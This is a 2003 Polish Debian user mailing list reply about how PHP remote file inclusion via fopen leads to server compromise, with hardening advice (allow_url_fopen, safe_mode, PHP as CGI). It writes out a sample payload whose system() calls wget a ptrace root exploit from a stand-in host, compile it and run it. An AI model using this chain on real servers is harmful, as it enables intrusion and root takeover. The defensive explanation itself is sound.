Re: Czy ja mam worma?

To: debian-user-polish@lists.debian.org
Subject: Re: Czy ja mam worma?
From: "Tomasz T. Ciaszczyk" <ciacho@ciacho.pl>
Date: Sun, 27 Apr 2003 15:57:38 +0200
Message-id: <[🔎] 20030427135738.GE30339@ciacho.pl>
Mail-followup-to: debian-user-polish@lists.debian.org
In-reply-to: <[🔎] Pine.LNX.4.44.0304270135440.26704-100000@wspinaczka.net>
References: <[🔎] 20030426110152.GC21575@ciacho.pl> <[🔎] Pine.LNX.4.44.0304270135440.26704-100000@wspinaczka.net>

Witam,

Dnia nie, kwi 27, 2003 at 01:39:30 CEST, Mirek Grochowski napisał:

: > : Napisz tylko jakie masz jajko i ilu masz userow z dostepem do shella.
: > A po cholere mi shell?
: Bo w zwiazku z ostatnia dziura latwo bylo uzyskac UID 0, a to juz paskudna
: sprawa.
A po ch*j mi do tego shell?
Robiac przez bledy w php'ie ten sam efekt zrobie.
Ktorys z exploitow do ptrace mial mozliwosc, ze jako argument podawalo
sie np. skrypt w sh ktory dodawal uzytkownika do systemu z uid 0..
Potem sie loguje via ssh i mam juz shella.
Wychodzenie z zalozenia, ze wlamac sie mona tylko z shella jest
bledem. Dobra zasada paranoika: _WSZYSTKO_ jest potencajlnie
exploitowalne. Przydaje sie ;).



: Moglbys troche rozwinac temat? Nie chodzi mi o .*Nuke ale ogolnie o co
: chodzi w fopen?

Juz skasowalem raport w ktorym mialem to opisane.
ale mniej wiecej:
na stronie jest sobie fopen($filename.$prefix)
wejscie na strone &filename=http://foo.com/exploit&prefix=txt
a w pliku na http://foo.com/exploit.txt:
system("uname -a");
system("wget http://foo.com/ptrace.c";);
system("gcc -o /tmp/str ptrace.c");
system("/tmp/str");

Proste co?
Zapobieganie: 
- blokada fopen na zewnatrz (czyli wsio co ma ftp://,
http:// inne_protokoly://). [allow_url_fopen = Off]
- blokada wywolywania system(); [safe_mode = On] (choc prawde
  powiedziawszy std safe_mode to troche malo... znam pewna firme ktora
  tak podkrecila safe_mode, ze user moze uzywac w phpie tylko
  kilkanascie podstatowych mozliwosci)

Ogolnie wszyscy zalecaja uzywanie php'a w chlapaczu jako ExecCGI
(mod_php: jeden Vhost moze nadpisywac pliki drugiego VHosta - poprostu
wszystrko lata na jednych prawach).



: Wlasciwie to zwlaszcza o metode zapobiegawcza :))

~ # head -n 13 /etc/php4/apache/php.ini
[PHP]

;;;;;;;;;;;
; WARNING ;
;;;;;;;;;;;
; This is the default settings file for new PHP installations.
; By default, PHP installs itself with a configuration suitable for
; development purposes, and *NOT* for production purposes.
; For several security-oriented considerations that should be taken
; before going online with your site, please consult php.ini-recommended
; and http://php.net/manual/en/security.php.



Pozdrawiam,
Tomasz T. Ciaszczyk


--  
.:  ciacho<at>ciacho.pl ciacho<at>jabber.org http://ciacho.pl :.
.: Ziemia nie jest bąkiem swobodnym - tu Himalaje, tam jakiś  :.
.:                      Rów Mariański...                      :.
.:                    -- prof. Jacek Własak                   :.

Attachment: pgp2oMSfscpJw.pgp
Description: PGP signature

Reply to:

Follow-Ups:
- Re: Czy ja mam worma?
  - From: Mirek Grochowski <mgroch@wspinaczka.net>
- Re[2]: Czy ja mam worma?
  - From: BadBorys <j.unk@poczta.fm>

References:
- Re: Czy ja mam worma?
  - From: "Tomasz T. Ciaszczyk" <ciacho@ciacho.pl>
- Re: Czy ja mam worma?
  - From: Mirek Grochowski <mgroch@wspinaczka.net>

Prev by Date: Re: plik strefy do mnie czy ode mnie ?
Next by Date: Przeniesienie linuxa na inny dysk
Previous by thread: Re: Czy ja mam worma?
Next by thread: Re: Czy ja mam worma?
Index(es):
- Date
- Thread